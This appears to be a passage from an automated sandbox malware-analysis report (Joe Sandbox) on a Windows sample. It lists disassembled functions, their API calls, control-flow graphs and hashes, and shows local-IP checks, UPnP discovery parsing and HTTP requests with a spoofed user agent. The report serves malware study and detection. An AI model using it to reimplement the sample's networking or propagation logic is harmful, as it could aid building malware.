                                                                                                                      • Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                                                                      • Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                                                                    • strcmp.NTDLL ref: 0040AED0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                    • API String ID: 2906596889-2213908610
                                                                                                                    • Opcode ID: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                                                                    • Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
                                                                                                                    • Opcode Fuzzy Hash: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                                                                    • Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E
                                                                                                                    Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 529 401920-401947 GetTickCount WaitForSingleObject 530 401ac9-401acf 529->530 531 40194d-401964 WSAWaitForMultipleEvents 529->531 532 4019f0-401a03 GetTickCount 531->532 533 40196a-401981 WSAEnumNetworkEvents 531->533 534 401a43-401a4c GetTickCount 532->534 535 401a05-401a14 EnterCriticalSection 532->535 533->532 536 401983-401988 533->536 538 401ab5-401ac3 WaitForSingleObject 534->538 539 401a4e-401a5d EnterCriticalSection 534->539 540 401a16-401a1d 535->540 541 401a3a-401a41 LeaveCriticalSection 535->541 536->532 537 40198a-401990 536->537 537->532 542 401992-4019b1 accept 537->542 538->530 538->531 543 401aa1-401ab1 LeaveCriticalSection GetTickCount 539->543 544 401a5f-401a77 InterlockedExchangeAdd call 40d4a0 539->544 545 401a35 call 401820 540->545 546 401a1f-401a27 540->546 541->538 542->532 548 4019b3-4019c2 call 4022c0 542->548 543->538 554 401a97-401a9f 544->554 555 401a79-401a82 544->555 545->541 546->540 550 401a29-401a30 LeaveCriticalSection 546->550 548->532 556 4019c4-4019df call 401740 548->556 550->538 554->543 554->544 555->554 557 401a84-401a8d call 40ab40 555->557 556->532 562 4019e1-4019e7 556->562 557->554 562->532 563 4019e9-4019eb call 401cf0 562->563 563->532
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                    • String ID: PCOI$ilci
                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                    • Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                                                                    • Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
                                                                                                                    • Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                                                                    • Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99
                                                                                                                    Function 0040E4F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • memset.NTDLL ref: 0040E518
                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
                                                                                                                    • HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E701
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E70E
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E71B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                    • Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                                                                    • Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
                                                                                                                    • Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                                                                    • Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54
                                                                                                                    Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                    • String ID: PCOI$ilci
                                                                                                                    • API String ID: 2403999931-3762367603
                                                                                                                    • Opcode ID: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                                                                    • Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
                                                                                                                    • Opcode Fuzzy Hash: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                                                                    • Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98
                                                                                                                    Function 00405880 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • memset.NTDLL ref: 00405898
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004058C4
                                                                                                                    • GetTickCount.KERNEL32 ref: 004058CA
                                                                                                                    • GetTickCount.KERNEL32 ref: 004058D3
                                                                                                                    • wsprintfW.USER32 ref: 004058E6
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 004058F3
                                                                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
                                                                                                                    • TranslateMessage.USER32(?), ref: 00405945
                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040594F
                                                                                                                    • ExitThread.KERNEL32 ref: 00405961
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                    • String ID: %x%X$0
                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                    • Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                                                                    • Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
                                                                                                                    • Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                                                                    • Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68
                                                                                                                    Function 0040DBC0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 678 40dbc0-40dc5b memset InternetCrackUrlA InternetOpenA 679 40dc61-40dc94 InternetConnectA 678->679 680 40ddd7-40dde0 678->680 681 40ddca-40ddd1 InternetCloseHandle 679->681 682 40dc9a-40dcca HttpOpenRequestA 679->682 681->680 683 40dcd0-40dce7 HttpSendRequestA 682->683 684 40ddbd-40ddc4 InternetCloseHandle 682->684 685 40ddb0-40ddb7 InternetCloseHandle 683->685 686 40dced-40dcf1 683->686 684->681 685->684 687 40dda6 686->687 688 40dcf7 686->688 687->685 689 40dd01-40dd08 688->689 690 40dd99-40dda4 689->690 691 40dd0e-40dd30 InternetReadFile 689->691 690->685 692 40dd32-40dd39 691->692 693 40dd3b 691->693 692->693 694 40dd3d-40dd94 call 409fe0 memcpy 692->694 693->690 694->689
                                                                                                                    APIs
                                                                                                                    • memset.NTDLL ref: 0040DBE8
                                                                                                                    • InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDC4
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDD1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                    • String ID: <$GET
                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                    • Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                                                                    • Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
                                                                                                                    • Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                                                                    • Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54
                                                                                                                    Function 0040E7C0 Relevance: 16.6, APIs: 11, Instructions: 144fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
                                                                                                                    • memcmp.NTDLL ref: 0040E8DD
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E90A
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E914
                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E962
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3902698870-0
                                                                                                                    • Opcode ID: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                                                                    • Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
                                                                                                                    • Opcode Fuzzy Hash: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                                                                    • Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58
                                                                                                                    Function 0040D2D0 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2D6
                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2DD
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2E8
                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2EF
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040D3DE
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D3ED
                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3862671961-0
                                                                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                    • Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
                                                                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                    • Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A
                                                                                                                    Function 0040B2C0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
                                                                                                                    • CreateFileW.KERNEL32(00416478,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B3E2
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B3EC
                                                                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                    • String ID: Vz@
                                                                                                                    • API String ID: 439099756-880565244
                                                                                                                    • Opcode ID: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                                                                    • Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
                                                                                                                    • Opcode Fuzzy Hash: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                                                                    • Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D
                                                                                                                    Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 671207744-0
                                                                                                                    • Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                                                                    • Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
                                                                                                                    • Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                                                                    • Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                    Function 0040D890 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleeprecvfrom
                                                                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                    • API String ID: 668330359-3973262388
                                                                                                                    • Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                                                                    • Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
                                                                                                                    • Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                                                                    • Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C
                                                                                                                    Function 0040EA30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
